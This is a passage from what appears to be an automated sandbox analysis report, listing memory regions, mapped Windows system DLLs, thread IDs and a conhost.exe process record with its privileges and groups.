	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1762
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 1794
	        start_va = 0x400000
	          end_va = 0x55ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 1795
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 1796
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 1824
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1825
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 1826
	        start_va = 0x5b0000
	          end_va = 0x77ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005b0000"
	        filename = ""

Region:
	              id = 1827
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 1828
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 1864
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 1865
	        start_va = 0x7ea40000
	          end_va = 0x7eb3ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007ea40000"
	        filename = ""

Region:
	              id = 1919
	        start_va = 0x100000
	          end_va = 0x1bdfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1920
	        start_va = 0x5a0000
	          end_va = 0x5a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005a0000"
	        filename = ""

Region:
	              id = 1921
	        start_va = 0x76630000
	          end_va = 0x766aafff
	       monitored = 0
	     entry_point = 0x7664e970
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")

Region:
	              id = 1922
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 1923
	        start_va = 0x1c0000
	          end_va = 0x1fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 1924
	        start_va = 0x400000
	          end_va = 0x43ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000400000"
	        filename = ""

Region:
	              id = 1925
	        start_va = 0x550000
	          end_va = 0x55ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000550000"
	        filename = ""

Region:
	              id = 1926
	        start_va = 0x75f10000
	          end_va = 0x75f53fff
	       monitored = 0
	     entry_point = 0x75f29d80
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll")

Region:
	              id = 1927
	        start_va = 0x75ba0000
	          end_va = 0x75c4cfff
	       monitored = 0
	     entry_point = 0x75bb4f00
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll")

Region:
	              id = 1928
	        start_va = 0x73d70000
	          end_va = 0x73d8dfff
	       monitored = 0
	     entry_point = 0x73d7b640
	     region_type = mapped_file
	            name = "sspicli.dll"
	        filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll")

Region:
	              id = 1929
	        start_va = 0x73d60000
	          end_va = 0x73d69fff
	       monitored = 0
	     entry_point = 0x73d62a00
	     region_type = mapped_file
	            name = "cryptbase.dll"
	        filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll")

Region:
	              id = 1930
	        start_va = 0x73e10000
	          end_va = 0x73e67fff
	       monitored = 0
	     entry_point = 0x73e525c0
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll")

Region:
	              id = 1943
	        start_va = 0x6f9d0000
	          end_va = 0x6f9e7fff
	       monitored = 0
	     entry_point = 0x6f9d4820
	     region_type = mapped_file
	            name = "atl.dll"
	        filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll")

Region:
	              id = 1944
	        start_va = 0x76950000
	          end_va = 0x76a96fff
	       monitored = 0
	     entry_point = 0x76961cf0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll")

Region:
	              id = 1945
	        start_va = 0x75dc0000
	          end_va = 0x75f0efff
	       monitored = 0
	     entry_point = 0x75e76820
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll")

Region:
	              id = 1946
	        start_va = 0x6f9b0000
	          end_va = 0x6f9c0fff
	       monitored = 0
	     entry_point = 0x6f9b4670
	     region_type = mapped_file
	            name = "vsstrace.dll"
	        filename = "\\Windows\\SysWOW64\\vsstrace.dll" (normalized: "c:\\windows\\syswow64\\vsstrace.dll")

Region:
	              id = 1947
	        start_va = 0x76cf0000
	          end_va = 0x76d81fff
	       monitored = 0
	     entry_point = 0x76d28cf0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll")

Region:
	              id = 1948
	        start_va = 0x73ed0000
	          end_va = 0x7408cfff
	       monitored = 0
	     entry_point = 0x73fb2a10
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll")

Region:
	              id = 1949
	        start_va = 0x766b0000
	          end_va = 0x766f4fff
	       monitored = 0
	     entry_point = 0x766cde90
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll")

Region:
	              id = 1950
	        start_va = 0x6f890000
	          end_va = 0x6f9aafff
	       monitored = 0
	     entry_point = 0x6f8d0930
	     region_type = mapped_file
	            name = "vssapi.dll"
	        filename = "\\Windows\\SysWOW64\\vssapi.dll" (normalized: "c:\\windows\\syswow64\\vssapi.dll")

Region:
	              id = 1951
	        start_va = 0x76aa0000
	          end_va = 0x76afefff
	       monitored = 0
	     entry_point = 0x76aa4af0
	     region_type = mapped_file
	            name = "ws2_32.dll"
	        filename = "\\Windows\\SysWOW64\\ws2_32.dll" (normalized: "c:\\windows\\syswow64\\ws2_32.dll")

Region:
	              id = 1952
	        start_va = 0x4880000
	          end_va = 0x4a5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004880000"
	        filename = ""

Region:
	              id = 1970
	        start_va = 0x5b0000
	          end_va = 0x5d9fff
	       monitored = 0
	     entry_point = 0x5b5680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1971
	        start_va = 0x680000
	          end_va = 0x77ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000680000"
	        filename = ""

Region:
	              id = 1972
	        start_va = 0x4880000
	          end_va = 0x4a07fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004880000"
	        filename = ""

Region:
	              id = 1973
	        start_va = 0x4a50000
	          end_va = 0x4a5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004a50000"
	        filename = ""

Region:
	              id = 1974
	        start_va = 0x75b70000
	          end_va = 0x75b9afff
	       monitored = 0
	     entry_point = 0x75b75680
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll")

Region:
	              id = 1975
	        start_va = 0x4a60000
	          end_va = 0x4be0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004a60000"
	        filename = ""

Region:
	              id = 1976
	        start_va = 0x4bf0000
	          end_va = 0x5feffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000004bf0000"
	        filename = ""

Region:
	              id = 1977
	        start_va = 0x5b0000
	          end_va = 0x5bcfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vssadmin.exe.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vssadmin.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vssadmin.exe.mui")

Region:
	              id = 1978
	        start_va = 0x20000
	          end_va = 0x20fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000020000"
	        filename = ""

Region:
	              id = 1979
	        start_va = 0x440000
	          end_va = 0x440fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000440000"
	        filename = ""

Region:
	              id = 1980
	        start_va = 0x5c0000
	          end_va = 0x5c3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005c0000"
	        filename = ""

Region:
	              id = 1983
	        start_va = 0x5ff0000
	          end_va = 0x60d9fff
	       monitored = 0
	     entry_point = 0x602d650
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll")

Region:
	              id = 1987
	        start_va = 0x764a0000
	          end_va = 0x764abfff
	       monitored = 0
	     entry_point = 0x764a3930
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll")

Region:
	              id = 2418
	        start_va = 0x5d0000
	          end_va = 0x5d0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000005d0000"
	        filename = ""

Region:
	              id = 2419
	        start_va = 0x76700000
	          end_va = 0x76783fff
	       monitored = 0
	     entry_point = 0x76726220
	     region_type = mapped_file
	            name = "clbcatq.dll"
	        filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll")

Region:
	              id = 2420
	        start_va = 0x5e0000
	          end_va = 0x5e0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000005e0000"
	        filename = ""

Region:
	              id = 2564
	        start_va = 0x450000
	          end_va = 0x48ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000450000"
	        filename = ""

Region:
	              id = 2565
	        start_va = 0x490000
	          end_va = 0x4cffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000490000"
	        filename = ""

Region:
	              id = 2575
	        start_va = 0x4d0000
	          end_va = 0x50ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000004d0000"
	        filename = ""

Region:
	              id = 2576
	        start_va = 0x510000
	          end_va = 0x54ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000510000"
	        filename = ""

Region:
	              id = 2577
	        start_va = 0x560000
	          end_va = 0x59ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000560000"
	        filename = ""

Region:
	              id = 2578
	        start_va = 0x5f0000
	          end_va = 0x62ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000005f0000"
	        filename = ""

Region:
	              id = 3047
	        start_va = 0x780000
	          end_va = 0x85ffff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "kernelbase.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui")

Region:
	              id = 3061
	        start_va = 0x5ff0000
	          end_va = 0x606ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000005ff0000"
	        filename = ""

Region:
	              id = 3062
	        start_va = 0x630000
	          end_va = 0x638fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "vsstrace.dll.mui"
	        filename = "\\Windows\\SysWOW64\\en-US\\vsstrace.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\vsstrace.dll.mui")


Thread:
	id = 85
	os_tid = 0x5c0


Thread:
	id = 92
	os_tid = 0x1390


Thread:
	id = 131
	os_tid = 0x288


Thread:
	id = 134
	os_tid = 0xc08


Thread:
	id = 135
	os_tid = 0xc0c


Process:
	id = "28"
	image_name = "conhost.exe"
	filename = "c:\\windows\\system32\\conhost.exe"
	page_root = "0x3b8ef000"
	os_pid = "0x13dc"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "25"
	os_parent_pid = "0x1104"
	cmd_line = "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"
	cur_dir = "C:\\Windows"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 1805
	        start_va = 0x32200000
	          end_va = 0x323fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000032200000"
	        filename = ""

Region:
	              id = 1806
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 1807
	        start_va = 0x5af20e0000
	          end_va = 0x5af211ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005af20e0000"
	        filename = ""

Region:
	              id = 1808
	        start_va = 0x5af2200000
	          end_va = 0x5af23fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005af2200000"
	        filename = ""

Region:
	              id = 1809
	        start_va = 0x24fd2780000
	          end_va = 0x24fd279ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd2780000"
	        filename = ""

Region:
	              id = 1810
	        start_va = 0x24fd27a0000
	          end_va = 0x24fd27b4fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024fd27a0000"
	        filename = ""

Region:
	              id = 1811
	        start_va = 0x7df5ff980000
	          end_va = 0x7ff5ff97ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df5ff980000"
	        filename = ""

Region:
	              id = 1812
	        start_va = 0x7ff7ff830000
	          end_va = 0x7ff7ff852fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff830000"
	        filename = ""

Region:
	              id = 1813
	        start_va = 0x7ff7ffcf0000
	          end_va = 0x7ff7ffd00fff
	       monitored = 0
	     entry_point = 0x7ff7ffcf16b0
	     region_type = mapped_file
	            name = "conhost.exe"
	        filename = "\\Windows\\System32\\conhost.exe" (normalized: "c:\\windows\\system32\\conhost.exe")

Region:
	              id = 1814
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 1815
	        start_va = 0x24fd27c0000
	          end_va = 0x24fd2a5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd27c0000"
	        filename = ""

Region:
	              id = 1816
	        start_va = 0x7ff958860000
	          end_va = 0x7ff95890cfff
	       monitored = 0
	     entry_point = 0x7ff9588781a0
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")

Region:
	              id = 1817
	        start_va = 0x7ff9575b0000
	          end_va = 0x7ff957797fff
	       monitored = 0
	     entry_point = 0x7ff9575dba70
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")

Region:
	              id = 1818
	        start_va = 0x24fd2780000
	          end_va = 0x24fd278ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024fd2780000"
	        filename = ""

Region:
	              id = 1819
	        start_va = 0x7ff7ff730000
	          end_va = 0x7ff7ff82ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007ff7ff730000"
	        filename = ""

Region:
	              id = 1820
	        start_va = 0x24fd27c0000
	          end_va = 0x24fd287dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 1821
	        start_va = 0x24fd2960000
	          end_va = 0x24fd2a5ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd2960000"
	        filename = ""

Region:
	              id = 1822
	        start_va = 0x7ff9586a0000
	          end_va = 0x7ff95873cfff
	       monitored = 0
	     entry_point = 0x7ff9586a78a0
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")

Region:
	              id = 1852
	        start_va = 0x5af2120000
	          end_va = 0x5af215ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005af2120000"
	        filename = ""

Region:
	              id = 1853
	        start_va = 0x24fd2880000
	          end_va = 0x24fd291ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd2880000"
	        filename = ""

Region:
	              id = 1854
	        start_va = 0x24fd2790000
	          end_va = 0x24fd2796fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd2790000"
	        filename = ""

Region:
	              id = 1855
	        start_va = 0x7ff955c90000
	          end_va = 0x7ff955ce8fff
	       monitored = 0
	     entry_point = 0x7ff955c9fbf0
	     region_type = mapped_file
	            name = "conhostv2.dll"
	        filename = "\\Windows\\System32\\ConhostV2.dll" (normalized: "c:\\windows\\system32\\conhostv2.dll")

Region:
	              id = 1856
	        start_va = 0x24fd2880000
	          end_va = 0x24fd2880fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024fd2880000"
	        filename = ""

Region:
	              id = 1857
	        start_va = 0x24fd2910000
	          end_va = 0x24fd291ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd2910000"
	        filename = ""

Region:
	              id = 1858
	        start_va = 0x7ff95a8f0000
	          end_va = 0x7ff95ab6cfff
	       monitored = 0
	     entry_point = 0x7ff95a9c4970
	     region_type = mapped_file
	            name = "combase.dll"
	        filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll")

Region:
	              id = 1859
	        start_va = 0x7ff9583d0000
	          end_va = 0x7ff9584ebfff
	       monitored = 0
	     entry_point = 0x7ff9584102b0
	     region_type = mapped_file
	            name = "rpcrt4.dll"
	        filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")

Region:
	              id = 1860
	        start_va = 0x7ff958130000
	          end_va = 0x7ff958199fff
	       monitored = 0
	     entry_point = 0x7ff958166d50
	     region_type = mapped_file
	            name = "bcryptprimitives.dll"
	        filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll")

Region:
	              id = 1861
	        start_va = 0x7ff95ad00000
	          end_va = 0x7ff95ae55fff
	       monitored = 0
	     entry_point = 0x7ff95ad0a8d0
	     region_type = mapped_file
	            name = "user32.dll"
	        filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")

Region:
	              id = 1862
	        start_va = 0x7ff95ab70000
	          end_va = 0x7ff95acf5fff
	       monitored = 0
	     entry_point = 0x7ff95abbffc0
	     region_type = mapped_file
	            name = "gdi32.dll"
	        filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")

Region:
	              id = 1863
	        start_va = 0x24fd2890000
	          end_va = 0x24fd2896fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd2890000"
	        filename = ""

Region:
	              id = 1874
	        start_va = 0x7ff958280000
	          end_va = 0x7ff9583c2fff
	       monitored = 0
	     entry_point = 0x7ff9582a8210
	     region_type = mapped_file
	            name = "ole32.dll"
	        filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")

Region:
	              id = 1875
	        start_va = 0x7ff959330000
	          end_va = 0x7ff95938afff
	       monitored = 0
	     entry_point = 0x7ff9593438b0
	     region_type = mapped_file
	            name = "sechost.dll"
	        filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")

Region:
	              id = 1876
	        start_va = 0x7ff958820000
	          end_va = 0x7ff95885afff
	       monitored = 0
	     entry_point = 0x7ff9588212f0
	     region_type = mapped_file
	            name = "imm32.dll"
	        filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")

Region:
	              id = 1877
	        start_va = 0x7ff958ba0000
	          end_va = 0x7ff958c60fff
	       monitored = 0
	     entry_point = 0x7ff958bc0da0
	     region_type = mapped_file
	            name = "oleaut32.dll"
	        filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")

Region:
	              id = 1878
	        start_va = 0x7ff9559b0000
	          end_va = 0x7ff955b35fff
	       monitored = 0
	     entry_point = 0x7ff9559fd700
	     region_type = mapped_file
	            name = "propsys.dll"
	        filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")

Region:
	              id = 1891
	        start_va = 0x24fd28a0000
	          end_va = 0x24fd28a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd28a0000"
	        filename = ""

Region:
	              id = 1892
	        start_va = 0x24fd28b0000
	          end_va = 0x24fd28b0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd28b0000"
	        filename = ""

Region:
	              id = 1893
	        start_va = 0x24fd2a60000
	          end_va = 0x24fd2be7fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024fd2a60000"
	        filename = ""

Region:
	              id = 1894
	        start_va = 0x24fd2bf0000
	          end_va = 0x24fd2d70fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024fd2bf0000"
	        filename = ""

Region:
	              id = 1895
	        start_va = 0x24fd2d80000
	          end_va = 0x24fd417ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000024fd2d80000"
	        filename = ""

Region:
	              id = 1918
	        start_va = 0x24fd4180000
	          end_va = 0x24fd41fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd4180000"
	        filename = ""

Region:
	              id = 1939
	        start_va = 0x5af2160000
	          end_va = 0x5af219ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000005af2160000"
	        filename = ""

Region:
	              id = 1940
	        start_va = 0x7ff959390000
	          end_va = 0x7ff95a8eefff
	       monitored = 0
	     entry_point = 0x7ff9594f11f0
	     region_type = mapped_file
	            name = "shell32.dll"
	        filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")

Region:
	              id = 1941
	        start_va = 0x7ff958020000
	          end_va = 0x7ff958062fff
	       monitored = 0
	     entry_point = 0x7ff958034b50
	     region_type = mapped_file
	            name = "cfgmgr32.dll"
	        filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll")

Region:
	              id = 1942
	        start_va = 0x7ff957800000
	          end_va = 0x7ff957e43fff
	       monitored = 0
	     entry_point = 0x7ff9579c64b0
	     region_type = mapped_file
	            name = "windows.storage.dll"
	        filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll")

Region:
	              id = 1965
	        start_va = 0x7ff9590c0000
	          end_va = 0x7ff959166fff
	       monitored = 0
	     entry_point = 0x7ff9590d58d0
	     region_type = mapped_file
	            name = "advapi32.dll"
	        filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")

Region:
	              id = 1966
	        start_va = 0x7ff9587b0000
	          end_va = 0x7ff958801fff
	       monitored = 0
	     entry_point = 0x7ff9587bf530
	     region_type = mapped_file
	            name = "shlwapi.dll"
	        filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")

Region:
	              id = 1967
	        start_va = 0x7ff9574b0000
	          end_va = 0x7ff9574befff
	       monitored = 0
	     entry_point = 0x7ff9574b3210
	     region_type = mapped_file
	            name = "kernel.appcore.dll"
	        filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll")

Region:
	              id = 1968
	        start_va = 0x7ff958070000
	          end_va = 0x7ff958124fff
	       monitored = 0
	     entry_point = 0x7ff9580b22e0
	     region_type = mapped_file
	            name = "shcore.dll"
	        filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll")

Region:
	              id = 1969
	        start_va = 0x7ff9574d0000
	          end_va = 0x7ff95751afff
	       monitored = 0
	     entry_point = 0x7ff9574d35f0
	     region_type = mapped_file
	            name = "powrprof.dll"
	        filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll")

Region:
	              id = 1982
	        start_va = 0x7ff957490000
	          end_va = 0x7ff9574a3fff
	       monitored = 0
	     entry_point = 0x7ff9574952e0
	     region_type = mapped_file
	            name = "profapi.dll"
	        filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll")

Region:
	              id = 1984
	        start_va = 0x7ff955e10000
	          end_va = 0x7ff955ea5fff
	       monitored = 0
	     entry_point = 0x7ff955e35570
	     region_type = mapped_file
	            name = "uxtheme.dll"
	        filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")

Region:
	              id = 1985
	        start_va = 0x24fd4200000
	          end_va = 0x24fd429ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000024fd4200000"
	        filename = ""

Region:
	              id = 1988
	        start_va = 0x24fd42a0000
